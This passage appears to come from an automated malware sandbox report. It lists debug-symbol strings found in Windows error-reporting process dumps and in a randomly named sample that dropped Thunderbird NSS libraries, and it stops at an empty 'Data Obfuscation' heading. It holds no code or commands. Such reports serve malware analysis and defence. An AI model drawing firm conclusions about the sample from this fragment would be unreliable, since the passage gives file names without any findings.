Source: Binary string: combase.pdb source: WerFault.exe, 00000005.00000003.273447115.0000000004B98000.00000004.00000040.sdmp, WerFault.exe, 0000000B.00000003.304056829.0000000004B08000.00000004.00000040.sdmp, WerFault.exe, 00000012.00000003.333656380.0000000002DA8000.00000004.00000040.sdmp, WerFault.exe, 00000015.00000003.361412743.0000000004C08000.00000004.00000040.sdmp, WerFault.exe, 0000001B.00000003.404017061.00000000055C8000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.474855541.000000000504A000.00000004.00000040.sdmp, WerFault.exe, 00000025.00000003.515869897.000000000546A000.00000004.00000040.sdmp
Source: Binary string: shell32.pdb9 source: WerFault.exe, 0000000B.00000003.304056829.0000000004B08000.00000004.00000040.sdmp
Source: Binary string: shcore.pdb, source: WerFault.exe, 00000020.00000003.474855541.000000000504A000.00000004.00000040.sdmp
Source: Binary string: wkernel32.pdb( source: WerFault.exe, 00000020.00000003.462921326.00000000029F3000.00000004.00000001.sdmp
Source: Binary string: wintrust.pdb: source: WerFault.exe, 00000020.00000003.474377331.000000000504E000.00000004.00000040.sdmp
Source: Binary string: urlmon.pdbi source: WerFault.exe, 00000025.00000003.515345814.000000000546E000.00000004.00000040.sdmp
Source: Binary string: ncrypt.pdb source: WerFault.exe, 0000001B.00000003.403630655.00000000055CC000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.474377331.000000000504E000.00000004.00000040.sdmp, WerFault.exe, 00000025.00000003.515345814.000000000546E000.00000004.00000040.sdmp
Source: Binary string: dpapi.pdb source: WerFault.exe, 0000001B.00000003.403630655.00000000055CC000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.474377331.000000000504E000.00000004.00000040.sdmp, WerFault.exe, 00000025.00000003.515345814.000000000546E000.00000004.00000040.sdmp
Source: Binary string: dpapi.pdb. source: WerFault.exe, 00000020.00000003.474377331.000000000504E000.00000004.00000040.sdmp
Source: Binary string: apphelp.pdb source: WerFault.exe, 00000005.00000003.273425957.00000000049C1000.00000004.00000001.sdmp, WerFault.exe, 0000000B.00000003.303970466.0000000004971000.00000004.00000001.sdmp, WerFault.exe, 00000012.00000003.333599368.0000000004DA1000.00000004.00000001.sdmp, WerFault.exe, 00000015.00000003.361366430.0000000004C31000.00000004.00000001.sdmp, WerFault.exe, 0000001B.00000003.403776159.00000000054D1000.00000004.00000001.sdmp, WerFault.exe, 00000020.00000003.474552945.00000000049A1000.00000004.00000001.sdmp, WerFault.exe, 00000025.00000003.515524165.0000000005301000.00000004.00000001.sdmp
Source: Binary string: z:\task_1542148442\build\src\obj-thunderbird\security\nss\lib\freebl\freebl_freebl3\freebl3.pdb source: freebl3[1].dll.1.dr
Source: Binary string: gdiplus.pdbp source: WerFault.exe, 00000020.00000003.474855541.000000000504A000.00000004.00000040.sdmp
Source: Binary string: version.pdb+ source: WerFault.exe, 0000000B.00000003.304056829.0000000004B08000.00000004.00000040.sdmp
Source: Binary string: rasadhlp.pdb source: WerFault.exe, 0000001B.00000003.403630655.00000000055CC000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.474377331.000000000504E000.00000004.00000040.sdmp, WerFault.exe, 00000025.00000003.515345814.000000000546E000.00000004.00000040.sdmp
Source: Binary string: shell32.pdblX source: WerFault.exe, 0000001B.00000003.404017061.00000000055C8000.00000004.00000040.sdmp
Source: Binary string: comctl32.pdbS source: WerFault.exe, 00000025.00000003.515869897.000000000546A000.00000004.00000040.sdmp
Source: Binary string: ole32.pdb! source: WerFault.exe, 0000000B.00000003.304056829.0000000004B08000.00000004.00000040.sdmp, WerFault.exe, 00000012.00000003.333656380.0000000002DA8000.00000004.00000040.sdmp
Source: Binary string: wininet.pdb source: WerFault.exe, 00000005.00000003.273447115.0000000004B98000.00000004.00000040.sdmp, WerFault.exe, 0000000B.00000003.304056829.0000000004B08000.00000004.00000040.sdmp, WerFault.exe, 00000012.00000003.333656380.0000000002DA8000.00000004.00000040.sdmp, WerFault.exe, 00000015.00000003.361412743.0000000004C08000.00000004.00000040.sdmp, WerFault.exe, 0000001B.00000003.404017061.00000000055C8000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.474855541.000000000504A000.00000004.00000040.sdmp, WerFault.exe, 00000025.00000003.515869897.000000000546A000.00000004.00000040.sdmp
Source: Binary string: psapi.pdb- source: WerFault.exe, 00000025.00000003.515869897.000000000546A000.00000004.00000040.sdmp
Source: Binary string: winnsi.pdbV source: WerFault.exe, 00000020.00000003.474377331.000000000504E000.00000004.00000040.sdmp
Source: Binary string: combase.pdb? source: WerFault.exe, 00000012.00000003.333656380.0000000002DA8000.00000004.00000040.sdmp
Source: Binary string: dhcpcsvc.pdb source: WerFault.exe, 0000001B.00000003.403630655.00000000055CC000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.474377331.000000000504E000.00000004.00000040.sdmp, WerFault.exe, 00000025.00000003.515345814.000000000546E000.00000004.00000040.sdmp
Source: Binary string: comctl32v582.pdb?A source: WerFault.exe, 00000012.00000003.333711850.0000000002DA0000.00000004.00000040.sdmp
Source: Binary string: ncryptsslp.pdb< source: WerFault.exe, 00000020.00000003.474377331.000000000504E000.00000004.00000040.sdmp
Source: Binary string: z:\task_1542148442\build\src\obj-thunderbird\security\nss\lib\softoken\softoken_softokn3\softokn3.pdb)) source: cYKFZFK0Rg.exe, 00000001.00000000.443368879.0000000003C42000.00000004.00000001.sdmp, softokn3.dll.1.dr
Source: Binary string: shlwapi.pdb2 source: WerFault.exe, 00000020.00000003.474855541.000000000504A000.00000004.00000040.sdmp
Source: Binary string: wininet.pdb9 source: WerFault.exe, 00000012.00000003.333656380.0000000002DA8000.00000004.00000040.sdmp
Source: Binary string: comctl32v582.pdbQ source: WerFault.exe, 00000015.00000003.361498528.0000000004C00000.00000004.00000040.sdmp
Source: Binary string: propsys.pdb$ source: WerFault.exe, 00000015.00000003.361412743.0000000004C08000.00000004.00000040.sdmp
Source: Binary string: wrpcrt4.pdbk source: WerFault.exe, 00000005.00000003.273441706.0000000004B91000.00000004.00000040.sdmp, WerFault.exe, 0000000B.00000003.304151461.0000000004B05000.00000004.00000040.sdmp, WerFault.exe, 00000012.00000003.333724286.0000000002DA5000.00000004.00000040.sdmp, WerFault.exe, 00000015.00000003.361392768.0000000004C01000.00000004.00000040.sdmp, WerFault.exe, 0000001B.00000003.403910058.00000000055C5000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.474484279.0000000005047000.00000004.00000040.sdmp, WerFault.exe, 00000025.00000003.515425429.0000000005467000.00000004.00000040.sdmp
Source: Binary string: comctl32.pdb- source: WerFault.exe, 00000012.00000003.333656380.0000000002DA8000.00000004.00000040.sdmp
Source: Binary string: powrprof.pdb9 source: WerFault.exe, 00000025.00000003.515869897.000000000546A000.00000004.00000040.sdmp
Source: Binary string: shcore.pdb source: WerFault.exe, 00000005.00000003.273447115.0000000004B98000.00000004.00000040.sdmp, WerFault.exe, 0000000B.00000003.304056829.0000000004B08000.00000004.00000040.sdmp, WerFault.exe, 00000012.00000003.333656380.0000000002DA8000.00000004.00000040.sdmp, WerFault.exe, 00000015.00000003.361412743.0000000004C08000.00000004.00000040.sdmp, WerFault.exe, 0000001B.00000003.404017061.00000000055C8000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.474855541.000000000504A000.00000004.00000040.sdmp, WerFault.exe, 00000025.00000003.515869897.000000000546A000.00000004.00000040.sdmp
Source: Binary string: z:\task_1542148442\build\src\obj-thunderbird\security\nss3.pdb source: cYKFZFK0Rg.exe, 00000001.00000000.443368879.0000000003C42000.00000004.00000001.sdmp, nss3[1].dll.1.dr
Source: Binary string: dwmapi.pdbxXiG source: WerFault.exe, 0000001B.00000003.404017061.00000000055C8000.00000004.00000040.sdmp
Source: Binary string: wgdi32.pdb source: WerFault.exe, 00000005.00000003.273425957.00000000049C1000.00000004.00000001.sdmp, WerFault.exe, 0000000B.00000003.303970466.0000000004971000.00000004.00000001.sdmp, WerFault.exe, 00000012.00000003.333599368.0000000004DA1000.00000004.00000001.sdmp, WerFault.exe, 00000015.00000003.361366430.0000000004C31000.00000004.00000001.sdmp, WerFault.exe, 0000001B.00000003.403776159.00000000054D1000.00000004.00000001.sdmp, WerFault.exe, 00000020.00000003.474552945.00000000049A1000.00000004.00000001.sdmp, WerFault.exe, 00000025.00000003.515524165.0000000005301000.00000004.00000001.sdmp
Source: Binary string: fltLib.pdb source: WerFault.exe, 00000005.00000003.273447115.0000000004B98000.00000004.00000040.sdmp, WerFault.exe, 0000000B.00000003.304056829.0000000004B08000.00000004.00000040.sdmp, WerFault.exe, 00000012.00000003.333656380.0000000002DA8000.00000004.00000040.sdmp, WerFault.exe, 00000015.00000003.361412743.0000000004C08000.00000004.00000040.sdmp, WerFault.exe, 0000001B.00000003.404017061.00000000055C8000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.474855541.000000000504A000.00000004.00000040.sdmp, WerFault.exe, 00000025.00000003.515869897.000000000546A000.00000004.00000040.sdmp
Source: Binary string: shell32.pdb source: WerFault.exe, 00000005.00000003.273447115.0000000004B98000.00000004.00000040.sdmp, WerFault.exe, 0000000B.00000003.304056829.0000000004B08000.00000004.00000040.sdmp, WerFault.exe, 00000012.00000003.333656380.0000000002DA8000.00000004.00000040.sdmp, WerFault.exe, 00000015.00000003.361412743.0000000004C08000.00000004.00000040.sdmp, WerFault.exe, 0000001B.00000003.404017061.00000000055C8000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.474855541.000000000504A000.00000004.00000040.sdmp, WerFault.exe, 00000025.00000003.515869897.000000000546A000.00000004.00000040.sdmp
Source: Binary string: z:\task_1542148442\build\src\obj-thunderbird\security\nss\lib\freebl\freebl_freebl3\freebl3.pdbZZ source: freebl3[1].dll.1.dr
Source: Binary string: propsys.pdb3 source: WerFault.exe, 00000012.00000003.333656380.0000000002DA8000.00000004.00000040.sdmp
Source: Binary string: msvcp_win.pdb source: WerFault.exe, 00000005.00000003.273425957.00000000049C1000.00000004.00000001.sdmp, WerFault.exe, 0000000B.00000003.303970466.0000000004971000.00000004.00000001.sdmp, WerFault.exe, 00000012.00000003.333599368.0000000004DA1000.00000004.00000001.sdmp, WerFault.exe, 00000015.00000003.361366430.0000000004C31000.00000004.00000001.sdmp, WerFault.exe, 0000001B.00000003.403776159.00000000054D1000.00000004.00000001.sdmp, WerFault.exe, 00000020.00000003.474552945.00000000049A1000.00000004.00000001.sdmp, WerFault.exe, 00000025.00000003.515524165.0000000005301000.00000004.00000001.sdmp
Source: Binary string: iphlpapi.pdb\ source: WerFault.exe, 00000020.00000003.474377331.000000000504E000.00000004.00000040.sdmp
Source: Binary string: dnsapi.pdb source: WerFault.exe, 0000001B.00000003.403630655.00000000055CC000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.474377331.000000000504E000.00000004.00000040.sdmp, WerFault.exe, 00000025.00000003.515345814.000000000546E000.00000004.00000040.sdmp
Source: Binary string: wimm32.pdb source: WerFault.exe, 00000005.00000003.273447115.0000000004B98000.00000004.00000040.sdmp, WerFault.exe, 0000000B.00000003.304056829.0000000004B08000.00000004.00000040.sdmp, WerFault.exe, 00000012.00000003.333656380.0000000002DA8000.00000004.00000040.sdmp, WerFault.exe, 00000015.00000003.361412743.0000000004C08000.00000004.00000040.sdmp, WerFault.exe, 0000001B.00000003.404017061.00000000055C8000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.474855541.000000000504A000.00000004.00000040.sdmp, WerFault.exe, 00000025.00000003.515869897.000000000546A000.00000004.00000040.sdmp
Source: Binary string: iertutil.pdbs source: WerFault.exe, 00000020.00000003.474377331.000000000504E000.00000004.00000040.sdmp
Source: Binary string: wwin32u.pdb source: WerFault.exe, 00000005.00000003.273425957.00000000049C1000.00000004.00000001.sdmp, WerFault.exe, 0000000B.00000003.303970466.0000000004971000.00000004.00000001.sdmp, WerFault.exe, 00000012.00000003.333599368.0000000004DA1000.00000004.00000001.sdmp, WerFault.exe, 00000015.00000003.361366430.0000000004C31000.00000004.00000001.sdmp, WerFault.exe, 0000001B.00000003.403776159.00000000054D1000.00000004.00000001.sdmp, WerFault.exe, 00000020.00000003.474552945.00000000049A1000.00000004.00000001.sdmp, WerFault.exe, 00000025.00000003.515524165.0000000005301000.00000004.00000001.sdmp
Source: Binary string: winhttp.pdb source: WerFault.exe, 00000015.00000003.361412743.0000000004C08000.00000004.00000040.sdmp, WerFault.exe, 0000001B.00000003.403630655.00000000055CC000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.474377331.000000000504E000.00000004.00000040.sdmp, WerFault.exe, 00000025.00000003.515345814.000000000546E000.00000004.00000040.sdmp
Source: Binary string: msctf.pdbZXOG source: WerFault.exe, 0000001B.00000003.404017061.00000000055C8000.00000004.00000040.sdmp
Source: Binary string: rsaenh.pdbrQ source: WerFault.exe, 0000001B.00000003.403630655.00000000055CC000.00000004.00000040.sdmp
Source: Binary string: shcore.pdbDX}G source: WerFault.exe, 0000001B.00000003.404017061.00000000055C8000.00000004.00000040.sdmp
Source: Binary string: wUxTheme.pdb source: WerFault.exe, 00000005.00000003.273447115.0000000004B98000.00000004.00000040.sdmp, WerFault.exe, 0000000B.00000003.304056829.0000000004B08000.00000004.00000040.sdmp, WerFault.exe, 00000012.00000003.333656380.0000000002DA8000.00000004.00000040.sdmp, WerFault.exe, 00000015.00000003.361412743.0000000004C08000.00000004.00000040.sdmp, WerFault.exe, 0000001B.00000003.404017061.00000000055C8000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.474855541.000000000504A000.00000004.00000040.sdmp, WerFault.exe, 00000025.00000003.515869897.000000000546A000.00000004.00000040.sdmp
Source: Binary string: ntasn1.pdb source: WerFault.exe, 0000001B.00000003.403630655.00000000055CC000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.474377331.000000000504E000.00000004.00000040.sdmp, WerFault.exe, 00000025.00000003.515345814.000000000546E000.00000004.00000040.sdmp
Source: Binary string: gdiplus.pdb source: WerFault.exe, 00000005.00000003.273447115.0000000004B98000.00000004.00000040.sdmp, WerFault.exe, 0000000B.00000003.304056829.0000000004B08000.00000004.00000040.sdmp, WerFault.exe, 00000012.00000003.333656380.0000000002DA8000.00000004.00000040.sdmp, WerFault.exe, 00000015.00000003.361412743.0000000004C08000.00000004.00000040.sdmp, WerFault.exe, 0000001B.00000003.404017061.00000000055C8000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.461640685.00000000044C6000.00000004.00000001.sdmp, WerFault.exe, 00000025.00000003.515869897.000000000546A000.00000004.00000040.sdmp
Source: Binary string: OnDemandConnRouteHelper.pdb source: WerFault.exe, 00000015.00000003.361412743.0000000004C08000.00000004.00000040.sdmp, WerFault.exe, 0000001B.00000003.403584503.00000000055D1000.00000004.00000001.sdmp, WerFault.exe, 00000020.00000003.474348185.0000000005052000.00000004.00000001.sdmp, WerFault.exe, 00000025.00000003.515274442.0000000005472000.00000004.00000001.sdmp
Source: Binary string: wmswsock.pdbW source: WerFault.exe, 00000025.00000003.515345814.000000000546E000.00000004.00000040.sdmp
Source: Binary string: wntdll.pdb( source: WerFault.exe, 00000005.00000003.268737897.00000000028E0000.00000004.00000001.sdmp, WerFault.exe, 00000012.00000003.322487440.0000000002C3D000.00000004.00000001.sdmp, WerFault.exe, 0000001B.00000003.390319982.000000000324D000.00000004.00000001.sdmp, WerFault.exe, 00000020.00000003.460504934.00000000029ED000.00000004.00000001.sdmp, WerFault.exe, 00000025.00000003.500274963.0000000002F6D000.00000004.00000001.sdmp
Source: Binary string: profapi.pdb source: WerFault.exe, 00000005.00000003.273447115.0000000004B98000.00000004.00000040.sdmp, WerFault.exe, 0000000B.00000003.304056829.0000000004B08000.00000004.00000040.sdmp, WerFault.exe, 00000012.00000003.333656380.0000000002DA8000.00000004.00000040.sdmp, WerFault.exe, 00000015.00000003.361412743.0000000004C08000.00000004.00000040.sdmp, WerFault.exe, 0000001B.00000003.404017061.00000000055C8000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.474855541.000000000504A000.00000004.00000040.sdmp, WerFault.exe, 00000025.00000003.515869897.000000000546A000.00000004.00000040.sdmp
Source: Binary string: dhcpcsvc6.pdb source: WerFault.exe, 0000001B.00000003.403630655.00000000055CC000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.474377331.000000000504E000.00000004.00000040.sdmp, WerFault.exe, 00000025.00000003.515345814.000000000546E000.00000004.00000040.sdmp
Source: Binary string: powrprof.pdbvX source: WerFault.exe, 0000001B.00000003.404017061.00000000055C8000.00000004.00000040.sdmp
Source: Binary string: cfgmgr32.pdbh source: WerFault.exe, 00000020.00000003.474855541.000000000504A000.00000004.00000040.sdmp
Source: Binary string: WindowsCodecs.pdb source: WerFault.exe, 00000020.00000003.474348185.0000000005052000.00000004.00000001.sdmp, WerFault.exe, 00000025.00000003.515291891.0000000005479000.00000004.00000001.sdmp
Source: Binary string: wgdi32full.pdb source: WerFault.exe, 00000005.00000003.273425957.00000000049C1000.00000004.00000001.sdmp, WerFault.exe, 0000000B.00000003.303970466.0000000004971000.00000004.00000001.sdmp, WerFault.exe, 00000012.00000003.333599368.0000000004DA1000.00000004.00000001.sdmp, WerFault.exe, 00000015.00000003.361366430.0000000004C31000.00000004.00000001.sdmp, WerFault.exe, 0000001B.00000003.403776159.00000000054D1000.00000004.00000001.sdmp, WerFault.exe, 00000020.00000003.474552945.00000000049A1000.00000004.00000001.sdmp, WerFault.exe, 00000025.00000003.515524165.0000000005301000.00000004.00000001.sdmp
Source: Binary string: fltLib.pdb(XYGr source: WerFault.exe, 0000001B.00000003.404017061.00000000055C8000.00000004.00000040.sdmp
Source: Binary string: sechost.pdb source: WerFault.exe, 00000005.00000003.273441706.0000000004B91000.00000004.00000040.sdmp, WerFault.exe, 0000000B.00000003.304024163.0000000004B01000.00000004.00000040.sdmp, WerFault.exe, 00000012.00000003.333642964.0000000002DA1000.00000004.00000040.sdmp, WerFault.exe, 00000015.00000003.361392768.0000000004C01000.00000004.00000040.sdmp, WerFault.exe, 0000001B.00000003.403910058.00000000055C5000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.474404687.0000000005044000.00000004.00000040.sdmp, WerFault.exe, 00000025.00000003.515363571.0000000005464000.00000004.00000040.sdmp
Source: Binary string: msctf.pdbG source: WerFault.exe, 00000025.00000003.515869897.000000000546A000.00000004.00000040.sdmp
Source: Binary string: combase.pdbw source: WerFault.exe, 00000025.00000003.515869897.000000000546A000.00000004.00000040.sdmp
Source: Binary string: propsys.pdb source: WerFault.exe, 00000005.00000003.273447115.0000000004B98000.00000004.00000040.sdmp, WerFault.exe, 0000000B.00000003.304056829.0000000004B08000.00000004.00000040.sdmp, WerFault.exe, 00000012.00000003.333656380.0000000002DA8000.00000004.00000040.sdmp, WerFault.exe, 00000015.00000003.361412743.0000000004C08000.00000004.00000040.sdmp, WerFault.exe, 0000001B.00000003.404017061.00000000055C8000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.474855541.000000000504A000.00000004.00000040.sdmp, WerFault.exe, 00000025.00000003.515869897.000000000546A000.00000004.00000040.sdmp
Source: Binary string: bcrypt.pdb] source: WerFault.exe, 0000000B.00000003.304056829.0000000004B08000.00000004.00000040.sdmp
Source: Binary string: dhcpcsvc6.pdb@Q source: WerFault.exe, 0000001B.00000003.403630655.00000000055CC000.00000004.00000040.sdmp
Source: Binary string: ncryptsslp.pdb source: WerFault.exe, 00000020.00000003.474377331.000000000504E000.00000004.00000040.sdmp, WerFault.exe, 00000025.00000003.515345814.000000000546E000.00000004.00000040.sdmp
Source: Binary string: msctf.pdb source: WerFault.exe, 00000005.00000003.273447115.0000000004B98000.00000004.00000040.sdmp, WerFault.exe, 0000000B.00000003.304056829.0000000004B08000.00000004.00000040.sdmp, WerFault.exe, 00000012.00000003.333656380.0000000002DA8000.00000004.00000040.sdmp, WerFault.exe, 00000015.00000003.361412743.0000000004C08000.00000004.00000040.sdmp, WerFault.exe, 0000001B.00000003.404017061.00000000055C8000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.474855541.000000000504A000.00000004.00000040.sdmp, WerFault.exe, 00000025.00000003.515869897.000000000546A000.00000004.00000040.sdmp
Source: Binary string: wmswsock.pdb source: WerFault.exe, 00000015.00000003.361412743.0000000004C08000.00000004.00000040.sdmp, WerFault.exe, 0000001B.00000003.403630655.00000000055CC000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.474377331.000000000504E000.00000004.00000040.sdmp, WerFault.exe, 00000025.00000003.515345814.000000000546E000.00000004.00000040.sdmp
Source: Binary string: msasn1.pdb] source: WerFault.exe, 00000025.00000003.515345814.000000000546E000.00000004.00000040.sdmp
Source: Binary string: version.pdb source: WerFault.exe, 00000005.00000003.273447115.0000000004B98000.00000004.00000040.sdmp, WerFault.exe, 0000000B.00000003.304056829.0000000004B08000.00000004.00000040.sdmp, WerFault.exe, 00000012.00000003.333656380.0000000002DA8000.00000004.00000040.sdmp, WerFault.exe, 00000015.00000003.361412743.0000000004C08000.00000004.00000040.sdmp, WerFault.exe, 0000001B.00000003.404017061.00000000055C8000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.474855541.000000000504A000.00000004.00000040.sdmp, WerFault.exe, 00000025.00000003.515869897.000000000546A000.00000004.00000040.sdmp
Source: Binary string: shlwapi.pdb<I source: WerFault.exe, 00000012.00000003.333656380.0000000002DA8000.00000004.00000040.sdmp
Source: Binary string: propsys.pdbNX{G source: WerFault.exe, 0000001B.00000003.404017061.00000000055C8000.00000004.00000040.sdmp
Source: Binary string: crypt32.pdb) source: WerFault.exe, 0000000B.00000003.304056829.0000000004B08000.00000004.00000040.sdmp
Source: Binary string: msasn1.pdb[ source: WerFault.exe, 0000000B.00000003.304056829.0000000004B08000.00000004.00000040.sdmp
Source: Binary string: fwpuclnt.pdb$Q.G source: WerFault.exe, 0000001B.00000003.403630655.00000000055CC000.00000004.00000040.sdmp
Source: Binary string: wintrust.pdb source: WerFault.exe, 0000001B.00000003.403630655.00000000055CC000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.474377331.000000000504E000.00000004.00000040.sdmp, WerFault.exe, 00000025.00000003.515345814.000000000546E000.00000004.00000040.sdmp
Source: Binary string: vcruntime140.i386.pdb source: cYKFZFK0Rg.exe, 00000001.00000000.443368879.0000000003C42000.00000004.00000001.sdmp, vcruntime140[1].dll.1.dr
Source: Binary string: Kernel.Appcore.pdb source: WerFault.exe, 00000005.00000003.273447115.0000000004B98000.00000004.00000040.sdmp, WerFault.exe, 0000000B.00000003.304056829.0000000004B08000.00000004.00000040.sdmp, WerFault.exe, 00000012.00000003.333656380.0000000002DA8000.00000004.00000040.sdmp, WerFault.exe, 00000015.00000003.361412743.0000000004C08000.00000004.00000040.sdmp, WerFault.exe, 0000001B.00000003.403630655.00000000055CC000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.474377331.000000000504E000.00000004.00000040.sdmp, WerFault.exe, 00000025.00000003.515345814.000000000546E000.00000004.00000040.sdmp
Source: Binary string: msasn1.pdbZ source: WerFault.exe, 00000020.00000003.474377331.000000000504E000.00000004.00000040.sdmp
Source: Binary string: psapi.pdb source: WerFault.exe, 00000005.00000003.273447115.0000000004B98000.00000004.00000040.sdmp, WerFault.exe, 0000000B.00000003.304056829.0000000004B08000.00000004.00000040.sdmp, WerFault.exe, 00000012.00000003.333656380.0000000002DA8000.00000004.00000040.sdmp, WerFault.exe, 00000015.00000003.361412743.0000000004C08000.00000004.00000040.sdmp, WerFault.exe, 0000001B.00000003.404017061.00000000055C8000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.474855541.000000000504A000.00000004.00000040.sdmp, WerFault.exe, 00000025.00000003.515869897.000000000546A000.00000004.00000040.sdmp
Source: Binary string: wUxTheme.pdb& source: WerFault.exe, 00000020.00000003.474855541.000000000504A000.00000004.00000040.sdmp
Source: Binary string: fwpuclnt.pdb source: WerFault.exe, 0000001B.00000003.403630655.00000000055CC000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.474377331.000000000504E000.00000004.00000040.sdmp, WerFault.exe, 00000025.00000003.515345814.000000000546E000.00000004.00000040.sdmp
Source: Binary string: cryptbase.pdb source: WerFault.exe, 00000005.00000003.273468571.0000000004B90000.00000004.00000040.sdmp, WerFault.exe, 0000000B.00000003.304142084.0000000004B00000.00000004.00000040.sdmp, WerFault.exe, 00000012.00000003.333711850.0000000002DA0000.00000004.00000040.sdmp, WerFault.exe, 00000015.00000003.361498528.0000000004C00000.00000004.00000040.sdmp, WerFault.exe, 0000001B.00000003.403983797.00000000055C0000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.474779031.0000000005040000.00000004.00000040.sdmp, WerFault.exe, 00000025.00000003.515804409.0000000005460000.00000004.00000040.sdmp
Source: Binary string: bcryptprimitives.pdb source: WerFault.exe, 00000005.00000003.273468571.0000000004B90000.00000004.00000040.sdmp, WerFault.exe, 0000000B.00000003.304142084.0000000004B00000.00000004.00000040.sdmp, WerFault.exe, 00000012.00000003.333711850.0000000002DA0000.00000004.00000040.sdmp, WerFault.exe, 00000015.00000003.361498528.0000000004C00000.00000004.00000040.sdmp, WerFault.exe, 0000001B.00000003.403983797.00000000055C0000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.474779031.0000000005040000.00000004.00000040.sdmp, WerFault.exe, 00000025.00000003.515804409.0000000005460000.00000004.00000040.sdmp
Source: Binary string: msctf.pdb( source: WerFault.exe, 00000015.00000003.361412743.0000000004C08000.00000004.00000040.sdmp
Source: Binary string: wkernelbase.pdb( source: WerFault.exe, 00000020.00000003.462570750.00000000029F9000.00000004.00000001.sdmp
Source: Binary string: z:\task_1542148442\build\src\obj-thunderbird\mozglue\build\mozglue.pdb22! source: mozglue[1].dll.1.dr
Source: Binary string: wininet.pdb' source: WerFault.exe, 00000025.00000003.515869897.000000000546A000.00000004.00000040.sdmp
Source: Binary string: oleaut32.pdb source: WerFault.exe, 00000005.00000003.273468571.0000000004B90000.00000004.00000040.sdmp, WerFault.exe, 0000000B.00000003.304142084.0000000004B00000.00000004.00000040.sdmp, WerFault.exe, 00000012.00000003.333711850.0000000002DA0000.00000004.00000040.sdmp, WerFault.exe, 00000015.00000003.361498528.0000000004C00000.00000004.00000040.sdmp, WerFault.exe, 0000001B.00000003.403983797.00000000055C0000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.474779031.0000000005040000.00000004.00000040.sdmp, WerFault.exe, 00000025.00000003.515804409.0000000005460000.00000004.00000040.sdmp
Source: Binary string: cfgmgr32.pdb7 source: WerFault.exe, 0000000B.00000003.304056829.0000000004B08000.00000004.00000040.sdmp
Source: Binary string: OneCoreUAPCommonProxyStub.pdb source: WerFault.exe, 00000005.00000003.273447115.0000000004B98000.00000004.00000040.sdmp, WerFault.exe, 0000000B.00000003.304056829.0000000004B08000.00000004.00000040.sdmp, WerFault.exe, 00000012.00000003.333656380.0000000002DA8000.00000004.00000040.sdmp, WerFault.exe, 00000015.00000003.361412743.0000000004C08000.00000004.00000040.sdmp, WerFault.exe, 0000001B.00000003.403630655.00000000055CC000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.474377331.000000000504E000.00000004.00000040.sdmp, WerFault.exe, 00000025.00000003.515345814.000000000546E000.00000004.00000040.sdmp
Source: Binary string: powrprof.pdbX source: WerFault.exe, 00000020.00000003.474855541.000000000504A000.00000004.00000040.sdmp
Source: Binary string: wuser32.pdb source: WerFault.exe, 00000005.00000003.273425957.00000000049C1000.00000004.00000001.sdmp, WerFault.exe, 0000000B.00000003.303970466.0000000004971000.00000004.00000001.sdmp, WerFault.exe, 00000012.00000003.333599368.0000000004DA1000.00000004.00000001.sdmp, WerFault.exe, 00000015.00000003.361366430.0000000004C31000.00000004.00000001.sdmp, WerFault.exe, 0000001B.00000003.403776159.00000000054D1000.00000004.00000001.sdmp, WerFault.exe, 00000020.00000003.474552945.00000000049A1000.00000004.00000001.sdmp, WerFault.exe, 00000025.00000003.515524165.0000000005301000.00000004.00000001.sdmp
Source: Binary string: OneCoreUAPCommonProxyStub.pdb<@ source: WerFault.exe, 00000012.00000003.333656380.0000000002DA8000.00000004.00000040.sdmp
Source: Binary string: combase.pdbb source: WerFault.exe, 00000020.00000003.474855541.000000000504A000.00000004.00000040.sdmp
Source: Binary string: fltLib.pdb{ source: WerFault.exe, 00000025.00000003.515869897.000000000546A000.00000004.00000040.sdmp
Source: Binary string: comctl32.pdb source: WerFault.exe, 00000005.00000003.273447115.0000000004B98000.00000004.00000040.sdmp, WerFault.exe, 0000000B.00000003.304056829.0000000004B08000.00000004.00000040.sdmp, WerFault.exe, 00000012.00000003.333656380.0000000002DA8000.00000004.00000040.sdmp, WerFault.exe, 00000015.00000003.361412743.0000000004C08000.00000004.00000040.sdmp, WerFault.exe, 0000001B.00000003.404017061.00000000055C8000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.474855541.000000000504A000.00000004.00000040.sdmp, WerFault.exe, 00000025.00000003.515869897.000000000546A000.00000004.00000040.sdmp
Source: Binary string: crypt32.pdb source: WerFault.exe, 00000005.00000003.273447115.0000000004B98000.00000004.00000040.sdmp, WerFault.exe, 0000000B.00000003.304056829.0000000004B08000.00000004.00000040.sdmp, WerFault.exe, 00000012.00000003.333656380.0000000002DA8000.00000004.00000040.sdmp, WerFault.exe, 00000015.00000003.361412743.0000000004C08000.00000004.00000040.sdmp, WerFault.exe, 0000001B.00000003.403630655.00000000055CC000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.474377331.000000000504E000.00000004.00000040.sdmp, WerFault.exe, 00000025.00000003.515345814.000000000546E000.00000004.00000040.sdmp

Data Obfuscation:

